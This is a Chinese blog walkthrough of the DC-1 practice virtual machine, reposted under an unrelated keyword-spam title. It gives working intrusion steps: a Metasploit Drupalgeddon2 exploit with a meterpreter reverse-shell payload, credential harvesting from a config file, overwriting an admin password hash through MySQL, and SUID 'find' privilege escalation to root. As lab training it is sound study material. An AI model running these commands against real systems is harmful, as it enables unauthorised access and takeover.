当前位置: 首页 > news >正文

洪都建设集团有限公司网站设计图网址

洪都建设集团有限公司网站,设计图网址,二级域名前缀大全,中堂镇做网站以前写过了#xff0c;有一些忘了#xff0c;快速的重温一遍。 DC一共九个靶场#xff0c;目标一天一个。 文章目录环境配置#xff1a;信息搜集#xff1a;漏洞复现#xff1a;FLAG获取环境配置#xff1a; 最简单的办法莫过于将kali和DC-1同属为一个nat的网络下。 信…以前写过了有一些忘了快速的重温一遍。 DC一共九个靶场目标一天一个。 文章目录环境配置信息搜集漏洞复现FLAG获取环境配置 最简单的办法莫过于将kali和DC-1同属为一个nat的网络下。 信息搜集 首先探测靶机ip两种方法 arp-scan -l nmap -sP 192.168.28.0/24靶机ip为192.168.28.129 明显有一个80端口继续用nmap探测端口情况。 还开起了22和111端口wappalyzer信息搜集看一下框架。 或者用kali自带的whatweb指纹探测。 whatweb -v 192.168.28.129同样得到的是Drupal7.0版本msfconsole里存在Drupal攻击模块。 漏洞复现 search去找Drupal模块 search Drupal进入exploit/unix/webapp/drupal_drupalgeddon2模块然后查看payload。 use exploit/unix/webapp/drupal_drupalgeddon2 show payloadsphp/meterpreter/reverse_tcp可以利用。 然后设置payload和配置。 set payload /php/meterpreter/reverse_tcp set RHOSTS 192.168.28.129输入exploit启动。 成功拿到shell先反弹shell。 python -c import pty;pty.spawn(/bin/bash)FLAG获取 然后ls -l发现flag1. Every good CMS needs a config file - and so do you 每个好的CMS都需要一个配置文件 - 你也是明显是想让我们去查看配置文件。 发现settings.php文件查看后得到flag2. Brute force and dictionary attacks arent the* only ways to gain access (and you WILL need access).* What can you do with these credentials? 蛮力和字典攻击不是*只有获得访问权限的方法您将需要访问权限。* 您可以使用这些凭据做什么不能爆破但在配置中存在mysql账号密码可以通过mysql查看账号密码。 mysql -udbuser -pR0ck3t登录mysql。 在其中找到user表。 但其中的pass被加密猜测存在哈希加密代码查找。 find . -name *hash*找到的password-hash.sh这肯定是加密代码cat一下。 #!/usr/bin/php ?php/*** Drupal hash script - to generate a hash from a plaintext password** Check for your PHP interpreter - on Windows youll probably have to* replace line 1 with* #!c:/program files/php/php.exe** param password1 [password2 [password3 ...]]* Plain-text passwords in quotes (or with spaces backslash escaped).*/if (version_compare(PHP_VERSION, 5.2.0, )) {$version PHP_VERSION;echo EOFERROR: This script requires at least PHP version 5.2.0. You invoked it withPHP version {$version}. \n EOF;exit; }$script basename(array_shift($_SERVER[argv]));if (in_array(--help, $_SERVER[argv]) || empty($_SERVER[argv])) {echo EOFGenerate Drupal password hashes from the shell.Usage: {$script} [OPTIONS] plan-text password Example: {$script} mynewpasswordAll arguments are long options.--help Print this page.--root pathSet the working directory for the script to the specified path.To execute this script this has to be the root directory of yourDrupal installation, e.g. /home/www/foo/drupal (assuming Drupalrunning on Unix). Use surrounding quotation marks on Windows.password1 [password2 [password3 ...]]One or more plan-text passwords enclosed by double quotes. Theoutput hash may be manually entered into the {users}.pass field tochange a password via SQL to a known value.To run this script without the --root argument invoke it from the root directory of your Drupal installation as./scripts/{$script} \n EOF;exit; }$passwords array();// Parse invocation arguments. while ($param array_shift($_SERVER[argv])) {switch ($param) {case --root:// Change the working directory.$path array_shift($_SERVER[argv]);if (is_dir($path)) {chdir($path);}break;default:// Add a password to the list to be processed.$passwords[] $param;break;} }define(DRUPAL_ROOT, getcwd());include_once DRUPAL_ROOT . /includes/password.inc; include_once DRUPAL_ROOT . /includes/bootstrap.inc;foreach ($passwords as $password) {print(\npassword: $password \t\thash: . user_hash_password($password) .\n); } print(\n);先看帮助理解脚本如何使用。 然后运行脚本然后得到加密过后密码随后密码替换。 update users set pass$S$Ds.RBZ79FgPXwUiHZZd5eo2rVbYQzTomLgBhA24Sw04Bnr3UWSpBwhere nameadmin;然后登录网站得到flag3 Special PERMS will help FIND the passwd - but you’ll need to -exec that command to work out how to get what’s in the shadow. 特殊的 PERMS 将帮助找到 passwd - 但您需要 -exec 该命令来弄清楚如何获取阴影中的东西。在/etc/passwd中发现flag4用户。 得到flag4。 Can you use this same method to find or access the flag in root?Probably. But perhaps its not that easy. Or maybe it is? 您可以使用相同的方法来查找或访问 root 中的标志吗 可能。但也许这并不容易。 或者也许是访问root文件夹需要root权限。 SUID提权: find / -user root -perm -4000 -print 2/dev/null其中就有find直接用。 find / -exec /bin/bash -p \;进入root目录得到最后的flag。 Well done!!!!Hopefully youve enjoyed this and learned some new skills.You can let me know what you thought of this little journey by contacting me via Twitter - DCAU7 干的好希望您喜欢这个并学到了一些新技能。你可以让我知道你对这个小旅程的看法 通过推特与我联系 - DCAU7利用hydra暴力破解得到flag4的密码。
http://www.tj-hxxt.cn/news/130344.html

相关文章:

  • 赶集网网站建设分析自建域名
  • 淄博圻谷网站建设制作安丘做网站的
  • 济南网站建设yigeseo用网站制作自己app软件
  • 高端响应式网站建设青海网站开发公司
  • 榆次做企业网站专业vi机构
  • pc端网站布局仙桃网站制作网站设计
  • 心理网站免费建设网页设计要用什么软件
  • 企业网站用什么做网站设置的参数
  • 甘肃省住房与城乡建设厅网站首页莱芜新闻直播
  • 可以直接进入网站的正能量移动网站有哪些
  • c to c网站开发网络设计目标及设计思想
  • 网站服务器部署宁波黄页网
  • 赣州做网站什么价格网页设计素材与效果图
  • 自己建私人网站做外贸不好做上海城乡建设学校网站
  • 成都做网站建设wordpress清除所有评论
  • 哪里做网站最好网站网站图片轮播怎么做
  • 苏州网站建设网络vps服务器购买
  • 常州网站建设百科网站空间是虚拟机吗
  • wordpress建立商业网站怎么样模仿网站
  • 建设网站与服务器wordpress 版本查询
  • 动力网站长沙企业模板建站
  • 做设计必看十大网站网站文章关键字密度
  • 在线购物网站网站生成器下载
  • 开发app和做网站深圳华南城网站建设
  • 外贸网站建设费用情况网站建设都有什么类型
  • 2023免费网站推广wordpress超出最大上传
  • 成都企业网站商城定制北京公司注册哪个园区免费
  • 怎么自创网站什么是跨境电商平台
  • 自适应企业网站源码建设工程合同包括哪些
  • 网站优化和提升网站排名怎么做如何建设网络营销网站